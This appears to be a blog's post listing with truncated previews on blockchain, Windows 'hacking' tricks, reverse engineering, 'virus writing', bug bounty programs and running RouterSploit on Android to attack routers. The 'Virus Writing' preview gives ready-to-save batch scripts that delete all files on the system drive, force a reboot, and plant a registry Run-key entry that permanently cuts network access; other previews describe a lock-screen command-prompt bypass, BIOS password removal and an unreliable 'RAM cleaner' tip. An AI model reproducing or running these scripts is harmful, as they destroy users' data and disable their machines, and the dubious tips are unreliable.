Posts

BlockChain Technology

Image
Blockchain technology is a new concept to understand, and its rapidly growing in every industry. In future technology virtual currency is the next stage of evolution of money. The words block and chain were used separately in Satoshi Nakamoto’s original paper in October 2008, and when the term moved into wider use it was originally block chain, before becoming a single word, blockchain, by 2016. In August 2014, the bitcoin blockchain file size reached 20 gigabytes in size. Blockchain technology have already placed in few countries. Funding and registration in the transport department in Australia. Real Estate department is growing fast by using BlockChain Technology in Dubai. Whereas Internal bank payments using BlockChain Technology in Singapore. Bitcoin: Bitcoin uses peer-to-peer technology to operate with no central authority or banks; managing transactions and the issuing of bitcoins is carried out collectively by the network. Bitcoin is open-source; its design is publ

Window Hacking

>>New:  As we heard that Microsoft officially closed security updates for Windows XP on 8th Apr 2014. But here you can do Security Updates for Windows XP. Below method can update your Windows XP up-to April 2019. STEPS TO FOLLOW: 1. Open Notepad 2. Copy and paste the following code Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady] “Installed”=dword:00000001 3.Save file as .reg extension 4. Double click on it When it runs then it you automatically get notification for Windows Update. Enjoy..!! >>Open COMMAND PROMPT while Locked by User. >open notepad >type www.command.com > then save as cmd.bat at desktop >then enter now its open…..enjoy >>If your computer is slow? then clean up the ram.. >Open notepad >type FREEMEM=SPACE(64000000) >Save it as ram.vbs now run the script. Check out !! >>CracK BIOS Password >Open the CPU >Observe the Motherbord >Remove the Silver Battery(3v) >Wa

Reverse Engineering

Image
Reverse-engineering  is especially important with computer hardware and software. Programs are written in a language, say C++ or Java, that’s understandable by other programmers. But to run on a computer, they have to be translated by another program, called a compiler, into the ones and zeros of machine language. Compiled code is incomprehensible to most programmers, but there are ways to convert machine code back to a more human-friendly format, including a software tool called a decompiler. Reverse-engineering is used for many purposes: as a learning tool; as a way to make new, compatible products that are cheaper than what’s currently on the market; for making software interoperate more effectively or to bridge data between different operating systems or databases; and to uncover the undocumented features of commercial products. Reverse-engineering can also expose security flaws and questionable privacy practice. With the help of Reverse Engineering we can modify a softwa

Virus Writing

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it on your own risk. This coding is only for knowledge purpose. All Scripts Here Are To Be Copied In Note Pad >>This Virus Deletes All The Content Of A Drive… @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code in a .bat file >>Disable Internet Permanently Save As A bat File echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE >>The Most Simple Virus To Crush The Window @Echo off Del C:\ *.* |y Save It As Anything.bat >> This Will Crash Ur Co

Bug Bounty Web List

What is the Bug Bounty Program? Bug Bounty program provides recognition and compensation to security researchers practising responsible disclosure. Company started Bug Bounty programs for improve their security, Cyber security researchers are finding vulnerabilities on top websites and get rewarded. Reward Programs AT&T – http://developer.att.com/developer/apiDetailPage.jsp?passedItemId=10700235 (To submit you need to sign up to the free Developer API program) Avast! – http://www.avast.com/bug-bounty Barracuda – http://barracudalabs.com/ Coinbase – https://coinbase.com/whitehat Chromium Project – http://www.chromium.org/ CrowdShield – https://crowdshield.com/ Cryptocat – https://crypto.cat/bughunt/ Facebook – http://www.facebook.com/whitehat/ Etsy – http://www.etsy.com/help/article/2463 Gallery – http://codex.gallery2.org/Bounties Ghostscript – http://ghostscript.com/Bug_bounty_program.html (Mostly software development, occasional security issues) Google –

Exploit Routers on an Unrooted Android Phone

Image
RouterSploit is a powerful exploit framework similar to  Metasploit , working to quickly identify and exploit common vulnerabilities in routers. And guess what. It can be run on most Android devices. I initially  covered RouterSploit on Kali Linux and macOS (OS X) , but this tutorial will walk you through setting up RouterSploit to work on an unrooted Android phone. This allows you to pwn any vulnerable router you can connect your smartphone to. Doing so takes seconds and shows the power of running Debian Linux tools on the device you carry everywhere. RouterSploit vs Routers Routers are our gateway to the world. They route our internet traffic, encrypt our traffic to protect our privacy, and link us to other devices on our local networks and on the World Wide Web. Most people take this wonderful device for granted, assuming once one is plugged in and providing the internet, the job of setting it up is done. Not knowing the router is actually its own Linux computer, most peop